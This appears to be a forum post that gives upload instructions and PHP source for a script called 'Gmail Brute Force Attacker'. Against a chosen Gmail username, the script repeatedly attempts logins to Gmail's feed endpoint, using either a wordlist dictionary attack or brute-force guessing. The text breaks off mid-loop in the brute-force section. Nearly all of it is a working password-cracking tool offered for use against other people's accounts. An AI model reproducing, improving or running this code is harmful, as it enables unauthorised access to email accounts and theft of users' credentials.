Save the code as gmail.php and upload it to a host/webserver that supports PHP, then upload your wordlist! (remember to state where your wordlist is on the webserver/host in these lines:
Code:
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
Then go to your file via web browser
Code:
<?php
//////////////////////
////Gmail-Brute//////
///Mad-Hatter///////
//////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
Gmail Brute Force Attacker |
|
|
<form> Username to brute: <input>
<input> - <input> </form> |
|
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("
Found the password of: ".$Dictionary[$Position]." For the account: ".$username." |
</body>
</html>");
}
}
echo "
Sorry... a password was not found for the account of ".$username." during the dictionary attack. |
";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass